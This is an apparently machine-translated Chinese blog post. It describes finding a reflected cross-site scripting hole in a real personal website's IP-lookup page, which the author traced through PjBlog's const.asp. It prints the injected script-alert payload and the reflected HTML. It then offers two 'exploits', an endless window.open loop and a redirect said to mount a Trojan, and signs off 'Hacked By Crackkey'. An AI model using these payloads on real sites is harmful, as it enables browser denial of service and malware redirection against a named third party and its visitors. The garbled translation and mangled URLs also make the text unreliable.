Cross-site detection from PjBlog

EcAngel ecangel.blogbus.com

Look, this title is very attractive. In fact, PjBlog does not have a cross-site vulnerability and has never been tested,

Even if there is one, we haven't found it yet, but there is a key point. Let's take the next step. Don't worry.

Due to the influence of Meister, I used to use PjBlog to write a blog, so I occasionally flip it over.

Source code.

The database connection file defined in PjBlog is in const. asp. Most of

PjBlog friends will modify the default database path. Of course, I am no exception.

I don't know how many times this file was leaked. Curious, I found a sensitive information,

In line 18th of const. asp, there is a Web site used for IP address query,

Const CookieName = "PJBlog2"
Const CookieNameSetting = "PJBlog2Setting"
Const IPViewURL = "http://www.dheart.net/ip/index.php? Ip = "IP address query URL
Response. Cookies (CookieNameSetting). Expires = day + 365
 

I opened the home page of this IP address to query the website,

Url: http://www.dheart.net

After observation, I found that this female webmaster is very good at ASP and PHP, and there is a dedicated technical discussion page on this personal website.

The entire site is compiled using PHP.

Open the "ip address query" page from the homepage,

Url: http://www.dheart.net/ip/

Enter <script> alert (EcAngel) </script> in the query input box to test the code.

The result is displayed three times in a row. You can view the source file code to obtain the results of Web Page execution after data is submitted.

<Center>
Query Result <br> <script> alert (EcAngel) </script> <br> the IP address is invalid! <P align = "center"> <font size = "2" color = "#999999"> the above data is for reference only </font> </p>
<Center> <table border = "0" align = "center">
<Tr> <td rowspan = "2" width = "28"> </td> <td width = "228">
<A href = "alert (EcAngel)Http://www.baidu.com? Tn = lphy_pg & cl = 3 & f = 5 & word = <script> alert (EcAngel) </script> "target =" _ blank "style =" text-decoration: none; "> <font style =" font-size: 12px; color: 000000 "> <B> Baidu </B> & nbsp; <script> alert (EcAngel) </script> related content </font> </a>
</Td> </tr> <td>
<A href = "alert (EcAngel)& Sa = % CB % D1 % CB % F7 & client = pub-5982123305735309 & forid = 1 & ie = GB2312 & oe = GB2312 & cof = GALT % 3A % 23008000% 3BGL % 3A1% 3 BDIV % 3A % 23336699% 3 BVLC % %%3bah % 3 Acenter % 3 BBGC % 3 AFFFFFF % 3 BLBGC % 3a3%99% 3 BALC % 3a%ff % 3BLC % 3a%ff % 3BT % 3a%00% 3 BGFNT % 3A0000FF % 3 BGIMP % 3A0000FF % 3 BFORID % 3A1% 3B & hl = zh-CN "> http://www.google.com/custom? Q = <script> alert (EcAngel) </script> & sa = % CB % D1 % CB % F7 & client = pub-5982123305735309 & forid = 1 & ie = GB2312 & oe = GB2312 & cof = GALT % 3A % 23008000% 3BGL % 3A1% 3 BDIV % 3A % 23336699% 3 BVLC % 3A663399% 3BAH % 3 Acenter % 3 BBGC % 3 AFFFFFF % 3 BLBGC % 3a3%99% 3 BALC % 3a%ff % 3BLC % 3a% % 3BT % 3A000000% 3 BGFNT % 3A0000FF % 3 BGIMP % 3A0000FF % 3 BFORID % 3A1% 3B & hl = zh-CN "target =" _ blank "style =" text-decoration: none; "> <font style =" font-size: 12px; color: 000000 "> <B> Google </B> & nbsp; medium <script> alert (EcAngel) </script> related content </font> </a>
</Td> </tr> </table> </center>
 

After the execution is complete, the page changes again, showing Baidu and Google's query-related content, but there is no result.

Because neither Baidu nor Google submits data for filtering, there is no cross-site exploitation,

The test results extracted from the above Code are the same. After comprehensive testing, only IP address queries have cross-site vulnerabilities.

Exploit

One: <script> while (1) {window. open () ;}</script> IE window endless loop

Two: <script> location. href = "http://www.google.com"; </script> mount a Trojan on a redirected page

Hacked By Crackkey